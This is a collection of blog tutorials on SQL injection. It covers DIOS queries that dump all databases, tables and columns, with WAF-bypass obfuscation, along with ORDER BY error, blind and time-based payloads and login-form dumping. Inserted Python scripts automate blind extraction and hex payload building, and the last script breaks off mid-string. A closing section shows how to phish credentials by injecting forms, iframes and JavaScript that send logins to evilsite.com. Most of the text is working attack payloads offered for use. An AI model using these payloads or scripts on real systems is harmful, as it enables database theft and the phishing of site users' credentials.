Friday, August 24, 2018

DIOS the SQL Injectors Weapon (Upgraded)




Starting on the name of My god "Allah" the most beneficent the most merciful

In this tutorial we continue our discussion of DIOS. If you have not read DIOS Part I, read that first to understand the basics and then come back to this one. In the last tutorial we discussed how to extract all databases, tables and columns together with one query, and then played with some basic conditions while extracting. In this tutorial I will concentrate on getting a better output: we will extract the database name, the table name and the columns in that table, and then play with some indexing. By the end of this tutorial we will be targeting an output like this:

 
First of all, let us start with the base query where we left off in the first tutorial: extracting the database name, table name and column names from all databases other than information_schema.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,table_schema,' :: ',table_name,' :: ',column_name))))a)

The condition table_schema!='information_schema' means that the rows describing the tables and columns of information_schema are left out of the output. 0x3c62723e is the hex encoding of <br>, so each row starts on a new line in the browser.

But as we can see, the database name and the table name are repeated in every row. So now we will add a condition that writes the database and table name only when the table changes.

(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'<br>',column_name), (column_name))))))a)

In the query above, (@tbl:=0x00) declares the @tbl variable, and the IF(...) is our condition. The basic syntax is IF(condition, value_if_true, value_if_false). Here (@tbl!=table_name) is the condition: it checks whether @tbl differs from the current table name, so it is true exactly once each time the table name changes. When the condition is true we print the database name, the table name and the column name, and at the same time store the table name in the variable: Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,'<br>',column_name). When the condition is false we print only the column name: (column_name). Note that the comparison looks at the table name alone, so two tables with the same name in different databases that happen to come out one after the other would share a single header; the trick also relies on MySQL returning the rows of information_schema.columns grouped by table, which is the usual order but is not guaranteed without an ORDER BY. Our next task is printing the number of rows in each table, and that has to be printed each time the table name is printed, which means we include it inside the true part.
(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')<br>',column_name), (column_name))))))a)

Here we declared one more variable, (@tbl_sc:=0x00), and saved the table_schema into it with @tbl_sc:=table_schema. With the two variables @tbl and @tbl_sc we can look up the row count of each table: (select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl). If you know basic SQL you can easily understand this subquery. Keep in mind that table_rows is only an estimate for InnoDB tables (and MySQL 8.0 caches these statistics), so treat the number as approximate. The last part is adding a count in front of each table name.
(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=table_schema,' :: ',@tbl:=table_name,' (Rows ',(select table_rows from information_schema.tables where table_schema=@tbl_sc and table_name=@tbl),')<br>',column_name), (column_name))))))a)

Here we declared a variable @num and initialised it with 0. Then, inside the true branch where the table names are printed, we print the variable and add 1 to it each time: @num:=(@num%2b1), where %2b is the URL-encoded plus sign (a raw + in a URL would be decoded as a space) and 0x2920 is ') '. So here we are done with the complete DIOS query. Now let us add some WAF bypass and some other basic database information to make it more usable.
(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=/*!12345'%69nformation_schema'*/)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c62723e,@num:=(@num%2b1),0x2920,@tbl_sc:=`table_schema`,0x203a3a20,@tbl:=`%74able_name`,0x2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c62723e,/*!12345`%63olumn_name`*/), (/*!12345`%63olumn_name`*/))))))a)


In the query above we added some basic WAF bypass and encoded all string literals to hex: keywords are broken up with URL-encoded letters (%73elect is select) and %0a newlines, and wrapped in /*!12345 ... */ version comments, which MySQL executes as SQL (the version condition 1.23.45 is always satisfied) while many WAFs treat them as plain comments. WAF bypassing will be explained later in our WAF bypass series. The last part is adding some HTML, our name, the database name, the version and so on to the query using concat.
COncaT%0a(0x3c62723e3c62723e3c2f63656e7465723e3c2f6469763e3c2f6469763e3c2f7461626c653e496e6a3363743364206279205a656e3c62723e3c666f6e7420636f6c6f723d677265656e3e56657273696f6e203a3c2f666f6e743e20,version(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e4461746162617365203c2f666f6e743e3a20,database(),0x3c62723e3c666f6e7420636f6c6f723d677265656e3e55736572203c2f666f6e743e3a,user(),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345%73elect*/(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0),(/*!12345%73elect*/(@a)/*!12345%66rom*/(/*!12345`%69nformation_%73chema`.`%63olumns`*/)%77here (`%74able_schema`!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@a:=%63oncat%0a(@a,0x3c62723e,if( (@tbl!=/*!12345`table_name`*/), %43oncat%0a(0x3c2f666f6e743e3c666f6e7420636f6c6f723d477265656e3e3c62723e,@num:=(@num%2b1),0x29203c666f6e7420636f6c6f723d2723463746453245273e204461746162617365203a20,@tbl_sc:=`table_schema`,0x205b205461626c65204e616d65203a20,@tbl:=`%74able_name`,0x5d2028526f777320,(/*!12345%73elect*/`table_rows`from/*!12345`%69nformation_schema`.`tables`*/where table_schema=@tbl_sc and/*!12345`%74able_name`*/=@tbl),0x293c666f6e7420636f6c6f723d7265643e3c62723e,/*!12345`%63olumn_name`*/),concat%0a(/*!12345`%63olumn_name`*/))))))a))


Here is our final query. That is the maximum we can get from it, although some people number the columns as well. I am not going to explain that here; if you understood how we built this query, you can easily build that one too.
I hope you enjoyed reading. Leave your valueable comments and feedback please.

Happy hacking with 1n51d3H4ck3r1337.
 

DIOS (Dump in One Shot) Explained

Starting on the name of My god "Allah" the most beneficent the most merciful

I do not know whether there is already an explanation of DIOS, or whether it is explained better elsewhere than the way I am going to explain it, but I know many injectors are searching for one, and I am getting many requests to write an explanation of DIOS. So let us start understanding DIOS and how it actually works. We will first make it easy and small, then move step by step to complex ones. To understand DIOS you have to read the tutorial at least twice with full concentration. If you think you will skim it step by step and understand it easily, you are wrong and in the wrong place. So if you really want to understand it, read carefully.

Here is a Basic Query which gives us all the databases
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The above query gives us all the databases in one shot. To understand how it works we first have to understand the innermost part of the query, and before that the use of the IN clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The above statement extracts all the records from the table where the name is either 'inj3ct0r', 'Zenodermus', 'Security' or 'Idiots', which can also be written using OR as given below.

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

The output of both statements will be the same. Now let us move back to DIOS, where the innermost statement is
(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

Here, for every row of information_schema.schemata, MySQL evaluates the WHERE clause, and the right-hand side of the IN assigns a new value to @a: the old @a with schema_name and '<br>' appended. The comparison itself is never true (the old value of @a never equals the new, longer value), so the inner SELECT returns no rows; what we are after is the side effect, because the assignment has still been executed once per row. In other words, @a is concatenated with itself in a loop, and each time "schema_name,'<br>'" is added to @a. Two caveats: MySQL does not guarantee the order in which user variables are read and assigned within a single statement, so DIOS relies on the behaviour of the server in front of you, and assigning user variables inside expressions is deprecated as of MySQL 8.0.13. Now let us see the rest of the query.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in ((@a:=concat(@a,schema_name,'<br>'))))a)

Now I guess you can understand that in the outer statement we are simply selecting the concatenated variable @a; (@a:=0x00) resets it to an empty string before the subquery runs. Now let us move to our next query, which gives us all the table names in one shot. One more thing: the reason we use this query instead of group_concat is that group_concat truncates its result at group_concat_max_len, which defaults to 1024 characters, so we cannot extract much data with it. Some other bypasses for the 1024 character limit are discussed at Death Row Injection.
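To make the side effect concrete, here is an added example that is not code from the original post: a Python model of what MySQL does, row by row, while evaluating the DIOS query, using the full version from the walk-through above (header once per table, row counts, numbering) so it covers both the explanation here and the Part II query. The user variables become ordinary Python variables; the rows standing in for information_schema.columns and the row counts in TABLE_ROWS are constructed sample data, and the schema names shop and blog are made up.

```python
# Added example, not code from the original post: a Python model of what MySQL does,
# row by row, while evaluating the Part II DIOS query. The user variables become
# ordinary Python variables; the sample rows below are constructed, not real data.

# Constructed rows of information_schema.columns: (table_schema, table_name, column_name),
# in the order the server happens to return them (grouped by table, as is usual).
COLUMNS = [
    ("information_schema", "TABLES", "TABLE_NAME"),   # removed by the WHERE clause
    ("shop", "users", "id"),
    ("shop", "users", "email"),
    ("shop", "users", "password"),
    ("shop", "orders", "id"),
    ("shop", "orders", "user_id"),
    ("blog", "posts", "id"),
    ("blog", "posts", "body"),
]
# Constructed information_schema.tables.table_rows values (an estimate for InnoDB tables)
TABLE_ROWS = {("shop", "users"): 42, ("shop", "orders"): 1337, ("blog", "posts"): 7}


def dios(columns=COLUMNS, table_rows=TABLE_ROWS, skip_schema="information_schema"):
    """Return (dump, selected_rows).

    dump          is the final value of @a, which the outermost SELECT reads back;
    selected_rows is what the inner SELECT itself returns, which is always empty.
    """
    a, tbl, tbl_sc, num = "", "", "", 0        # (@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(@num:=0)
    selected = []
    for table_schema, table_name, column_name in columns:
        if table_schema == skip_schema:        # WHERE (table_schema!='information_schema')
            continue
        if tbl != table_name:                  # IF((@tbl!=table_name), <true part>, (column_name))
            num += 1                           # @num:=(@num+1)
            tbl_sc = table_schema              # @tbl_sc:=table_schema
            tbl = table_name                   # @tbl:=table_name
            # (select table_rows from information_schema.tables
            #  where table_schema=@tbl_sc and table_name=@tbl)
            rows = table_rows.get((tbl_sc, tbl))
            piece = f"<br>{num}) {tbl_sc} :: {tbl} (Rows {rows})<br>{column_name}"
        else:
            piece = column_name
        a = a + "<br>" + piece                 # @a:=concat(@a,0x3c62723e,...): the side effect we want
        if "" == a:                            # AND (0x00) IN (@a:=...): '' never equals the
            selected.append(a)                 # growing string, so no row is ever selected
    return a, selected


def render(dump):
    """Split the <br>-separated dump into the lines a browser would display."""
    return [line for line in dump.split("<br>") if line]


if __name__ == "__main__":
    dump, selected = dios()
    print("rows returned by the inner SELECT:", selected)
    for line in render(dump):
        print(line)
```

Running it prints an empty list for the inner SELECT and then the numbered dump, which is the point: the data never travels through the result set of the subquery, only through the variable. Because the header check compares table names only, a second table called users in another schema that came out directly after shop.users would not get its own header; comparing (schema, table) pairs instead would fix that at the cost of a longer payload.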
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query gives us all the table names in the same manner we got the database names, but this time we need to add a condition to remove the tables that belong to information_schema. Below is the query for that.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the query gives us all the table names excluding those from information_schema. But there is still a problem: we cannot see which table belongs to which database, so we also include table_schema in each concatenation (0x3a is ':').
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we have all the database names and the table names, but there is a better option: get all the database names, table names and column names together using the information_schema.columns table.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now let us take a common challenge that gets posted, extracting all the table names that start with 'shit_'. In that case we add another condition, as the query below shows.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in the next part of the DIOS explanation.

Group By and Order by SQL injection

Hello, I hope you enjoyed reading our SQL injection tutorials. In this tutorial we will discuss how to inject when the point of injection is in an ORDER BY clause or a GROUP BY clause.

I will concentrate on ORDER BY injection, because injecting into a GROUP BY clause is really simple: a UNION can legally follow GROUP BY, so ordinary union-based injection works there, whereas a UNION cannot be placed after ORDER BY.

There are three ways we are going to discuss for injecting into an ORDER BY clause.
1. Error Based Injection
2. Error Based Blind Injection
3. Time Based Blind Techniques.

Exploitation using XPATH injection.

Query:
select posts from content where submit=1 order by $sort
Injection
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))#
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--+

The above query will output the data in the form of an error. Note that MySQL only treats -- as a comment when it is followed by a space, which is why --+ (the + becomes a space in a URL) or # is normally used. For the rest of the exploitation using XPATH, read XPATH Injection.

select posts from content where submit=1 order by `$sort`
In such cases you will see the column name in the parameter, so close the backtick first and then inject.
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))#
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--+
Again the data comes back in the form of an error; for the rest of the exploitation using XPATH, read XPATH Injection.

Error Based Blind Injection

This is the case when you cannot see any direct error from the database. In such cases we create the error ourselves, and from the behaviour of the page (no output, or some other kind of error) we know that an error occurred. Below is a query I built so that it raises an error only when the condition is true and otherwise runs normally. By looking at the page we can tell true from false.
select posts from content where submit=1 order by `$sort`
Again the column name appears in the parameter, so close the backtick first and then inject.

Injections
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--+
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))#

Here database() like database() is the condition under test; you can put any condition there, and the other blind injection syntaxes will also work. When the condition is true the subquery returns 0 and extractvalue is handed '0:', which is not a valid XPath expression, so it raises an error; when the condition is false the subquery returns NULL and nothing happens. You can use this to extract the database using blind injection.

select posts from content where submit=1 order by `$sort`
Remember that if you try to create the error here with an unknown column name, you will get the usual 'unknown column' error, which is no different from the XPATH case above. The injection below is for cases where the XPATH functions are not available or disabled: when the condition is false the ELSE branch runs a subquery that returns more than one row, and MySQL raises 'Subquery returns more than 1 row'; when the condition is true the expression is simply 1.

Injections
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--+
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1#

Here 1=1 is the condition under test; you can use any condition, and the other blind injection syntaxes will also work. You can use this to extract the database using blind injection.


For the rest of the exploitation you can use Blind Injection.

Exploitation using Time Based Blind Techniques.

Sometimes you face a situation where true and false produce no visible difference, or the page redirects somewhere. In such a case it becomes tough to use blind injection. What we do now is build the query so that it delays when the condition is true and replies normally otherwise.
Query:
select posts from content where submit=1 order by `$sort`
Injection
input : id`,(select sleep(10) from dual where database() like database())#
input : id`,(select sleep(10) from dual where database() like database())--
input : id`,(select sleep(10) from dual where database() like database())--+

The above query replies normally if the condition is false; otherwise it takes time to reply, and this is how we extract the data. For the rest of the exploitation using time-based blind injection, read Time Based Blind Injection.

Dumping Database From Login Form

Hello, I hope you enjoyed reading Basic Injection, Login Form Bypass and so on. It is time to move on to how someone can dump the database through a vulnerable login form.

The trick was already discussed in earlier tutorials, and a deep knowledge of those injections is enough to collect data from a login form. But for the purpose of this tutorial, and to open your mind to this kind of exploitation, we discuss here how to collect data from a login form.

First of all, there are three ways of getting data out of login forms.
1. XPath Injection
2. Sub Query Injection
3. Blind Injection (both techniques)

I strongly suggest you read them all, as I will not discuss these injections in detail here. We only discuss the small change needed in the injection; everything else remains the same.

As in Bypassing Login Form with SQL injection, we take a vulnerable login script and start exploring it. The user-supplied values go straight into the query string, which is the whole vulnerability; the mysql_* functions it uses were removed in PHP 7.

Example:
$uname=$_POST['uname'];
$passwrd=$_POST['passwrd'];
$query="select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";
$result=mysql_query($query);
$rows=mysql_fetch_array($result);
if($rows)
{
    echo "You have Logged in successfully";
    create_session();
}
else
{
    echo "Better Luck Next time";
}

Exploitation using XPATH injection.

Query:
select username,pass from users where username='$uname' and password='$passwrd' limit 0,1
Injection
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""="
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) #
username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --
username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --

You can leave the password field empty. If the page is actually vulnerable, one of the above will work and we continue with that one. Now let us see what query gets executed; for the query given above, the first injection works.

select username,pass from users where username='' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='' and password='' limit 0,1

So the above query will output the data in the form of an error: AND binds tighter than OR, so the WHERE clause becomes '' or (extractvalue(...) and ''=''), and extractvalue raises the error as soon as it is evaluated. For the rest of the exploitation using XPATH, read XPATH Injection.

Exploitation using Sub-Query Injection.

select username,pass from users where username="$uname" and password="$passwrd" limit 0,1
select username,pass from users where username='$uname' and password='$passwrd' limit 0,1
Injections
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --

You can again leave the password field empty. If the page is actually vulnerable, one of the above will work and we continue with that one. Now let us see what query gets executed; for the query given above, the first injection works.

select username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1

So the above query will output the data in the form of an error: grouping by a value that contains floor(rand(0)*2) produces a 'Duplicate entry ... for key group_key' error, and the duplicated entry contains database(). For the rest of the exploitation, read Sub Query Injection.

Exploitation using Blind Injection

Okay, now as it is blind we will again ask the database questions: if it allows us to log in the answer is true, otherwise it is false.

First we need to find the right bypass string, to learn what query is being used inside the application. You can read the Login Bypass tutorial to understand more about it. Let us say we found that the following injection works and allows us to bypass the login.

' or true-- 

That means we are commenting out the rest of the query. Remember that MySQL treats -- as a comment only when it is followed by a space, so type the trailing space.

Let us start by checking the length of database().
Querying whether the length of database() is equal to 10:
username = ' or (select 1 from dual where length(database())=10)-- 

If it allows you to log in, the answer is yes; if not, try other numbers. You can always use the greater-than and less-than operators to make the process faster, halving the remaining range with each question.

Once you know the length of database() you can start collecting it character by character, as in Blind Injection. Read Blind SQL Injection for the rest of the exploitation.
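As an added example that is not part of the original post, the following Python script automates the length and character questions for both blind variants described on this page: the login form oracle just above (true when the login succeeds) and the ORDER BY time-based oracle from the Group By and Order By tutorial (true when the reply is slow). A binary search over length(database()) and ascii(substring(database(),i,1)) needs about eight requests per character instead of one per candidate character. The FakeTarget class, the database names used in it and the simulated reply times are constructed stand-ins so the script runs offline; to use it for real, replace the lambda passed to extract() with a function that sends the payload and reports what the page did.

```python
import re

# Added example, not code from the original post: blind extraction of database()
# through the login form (boolean oracle) and the ORDER BY clause (time oracle).

# Injection templates from the two tutorials above. The trailing space after -- is
# required by MySQL for -- to count as a comment.
BOOL_TEMPLATE = "' or (select 1 from dual where {cond})-- "
TIME_TEMPLATE = "id`,(select sleep({delay}) from dual where {cond})#"


def boolean_payload(cond):
    return BOOL_TEMPLATE.format(cond=cond)


def time_payload(cond, delay=10):
    return TIME_TEMPLATE.format(cond=cond, delay=delay)


def binary_search(ask, expr, lo, hi):
    """Return the integer value of `expr` in [lo, hi] using questions of the form `expr>N`."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"{expr}>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(ask, expr="database()", max_len=64):
    """ask(cond) returns True when the application shows its 'true' behaviour for cond."""
    length = binary_search(ask, f"length({expr})", 0, max_len)
    return "".join(
        chr(binary_search(ask, f"ascii(substring({expr},{i},1))", 0, 255))
        for i in range(1, length + 1)
    )


class FakeTarget:
    """Offline stand-in for the vulnerable application (constructed; dbname is made up).
    It recognises only the two payload shapes above and the two condition shapes extract() asks."""

    def __init__(self, dbname="shop_db"):
        self.dbname = dbname
        self.requests = 0

    def _truth(self, cond):
        self.requests += 1
        m = re.fullmatch(r"length\(database\(\)\)>(\d+)", cond)
        if m:
            return len(self.dbname) > int(m.group(1))
        m = re.fullmatch(r"ascii\(substring\(database\(\),(\d+),1\)\)>(\d+)", cond)
        if m:
            return ord(self.dbname[int(m.group(1)) - 1]) > int(m.group(2))
        raise ValueError(f"unsupported condition: {cond}")

    def login(self, username):
        """Login form: True means the page said 'You have Logged in successfully'."""
        m = re.fullmatch(r"' or \(select 1 from dual where (.+)\)-- ", username)
        return bool(m) and self._truth(m.group(1))

    def order_by(self, sort):
        """ORDER BY `$sort`: returns the simulated response time in seconds (no real sleep)."""
        m = re.fullmatch(r"id`,\(select sleep\((\d+)\) from dual where (.+)\)#", sort)
        if not m:
            return 0.2
        return float(m.group(1)) if self._truth(m.group(2)) else 0.2


def extract_via_login(target):
    return extract(lambda cond: target.login(boolean_payload(cond)))


def extract_via_timing(target, delay=10):
    # a reply slower than half the requested delay counts as "true"
    return extract(lambda cond: target.order_by(time_payload(cond, delay)) > delay / 2)


if __name__ == "__main__":
    t = FakeTarget()
    print(extract_via_login(t), "recovered in", t.requests, "requests")
```

With the time-based oracle, pick the threshold from the real network's jitter and consider repeating a borderline question; one misjudged answer in a binary search corrupts the rest of that character.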

URL Spoofed Phishing using SQLi

Welcome to yet another of my tutorials related to SQLi. This time, as the title says, we are going to do phishing with URL spoofing using a SQL injection vulnerability. For those who have not read the basics of SQL injection, I suggest you go and read the N00bz guide to SQL injection.

If you are new to phishing, let me explain: phishing is an attack where an attacker fools the user into entering secret credentials, which are sent to the attacker through a specially crafted page or application.

The Concept:

We are going to inject our payload into the SQL injection and add some extra code to the webpage just as we did in XSS. If you have not read XSS with SQL Injection Tutorial then read that for a better understanding.

Approaches we can use to Achieve it.

1. Finding the Vulnerability.
2. Preparing the Injectable Query.
3. Inject an HTML Coded form into the Website (For n00bz like me)
4. Inject an Iframe into the Website
5. Redirect the user to Your Fake Page (URL will be changed)
6. Inject JavaScript to change the Current Login Form (For l33ts like my Friend d3c0mp!l3R)

Finding the vulnerability and preparing the injectable query are covered in the Basic SQL injection tutorials. Read them before you continue.

I suppose you have read them all.

So lets continue

3. Inject HTML Coded form into Website

I assume you have read the above tutorials, so take for example a website where the 3rd column is printed on the page as output. We inject our payload into it. To keep things simple, and to avoid quote characters, we encode the payload as a hex literal. The unclosed <iframe> at the end of the payload hides the remainder of the original page's markup so only our form is visible.

Our Payload

<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>

Hex Encoded value:
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--

The above URL outputs our payload into the website, and the user sees a form in the page; if he logs in through it, the credentials are sent to the attacker.

4. Injection Iframe into the Website

This time we inject an iframe into the website, which keeps the payload small and lets us make the login look much better.

Our Payload
<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>

Hex Encoded value
0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--

The above URL renders our fake page inside the website; if the user logs in there, the credentials are sent to the attacker.

5. Redirect user to Your Fake Page

This time we inject JavaScript that redirects the user to our fake page.

Our Payload
<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above URL injects JavaScript into the page that redirects the user to our fake page; if he logs in there, the credentials are sent to the attacker. The drawback is that the address bar now shows our URL. The next attack fixes that.

6. Inject a javascript to change Current Login Form

In this attack we inject JavaScript that changes the action of the site's real login form to our fake login page, so the URL in the address bar stays the legitimate one. The script must run after the form exists in the DOM, so the injected column has to be printed below the form in the page (or the assignment wrapped in a load handler).

Our Payload
<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above URL injects JavaScript into the page that sends the credentials a user types into the real login form to our fake page.
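Added example, not code from the original post: a Python helper that produces the 0x... literals used in the union payloads above and in the DIOS queries at the top of the page, decodes them back so the long hex blobs can be read, and assembles the injected URL. exploitable-web.com, link.php, the id parameter and the four-column layout with the 3rd column echoed are the page's own placeholders; the payload strings are typed out from the HTML shown above. The trailing space after -- is there because MySQL otherwise does not treat -- as a comment.

```python
from urllib.parse import quote

# Added example, not code from the original post. MySQL hex literals (0x...) are the
# usual way to smuggle strings through an injection point without quote characters.


def to_hex_literal(text):
    """'<br>' -> '0x3c62723e'. In a string context MySQL treats 0x... as the raw bytes."""
    return "0x" + text.encode("utf-8").hex()


def from_hex_literal(literal):
    """Reverse of to_hex_literal; useful for reading the long 0x... blobs in the DIOS queries."""
    body = literal[2:] if literal[:2].lower() == "0x" else None
    if body is None or len(body) % 2 or not all(c in "0123456789abcdefABCDEF" for c in body):
        raise ValueError("expected a 0x literal with an even number of hex digits")
    return bytes.fromhex(body).decode("utf-8")


def union_payload(html, ncols=4, visible_col=3, quote_char="'"):
    """Build "-1' union select 1,2,0x...,4-- " with the hex-encoded HTML in the echoed column."""
    if not 1 <= visible_col <= ncols:
        raise ValueError("visible_col must be within 1..ncols")
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[visible_col - 1] = to_hex_literal(html)
    # trailing space: MySQL only treats -- as a comment when whitespace follows it
    return f"-1{quote_char} union select {','.join(cols)}-- "


def inject_url(base, param, payload):
    """URL-encode the payload (the trailing space becomes %20; a raw + would decode to a space)."""
    return f"{base}?{param}={quote(payload, safe='')}"


# The page's payloads as plain text (constructed to match the HTML shown above).
FORM_PAYLOAD = (
    '<form action=http://evilsite.com/get_it.php method="POST">'
    'Username : <input type="text" name="username"><br>'
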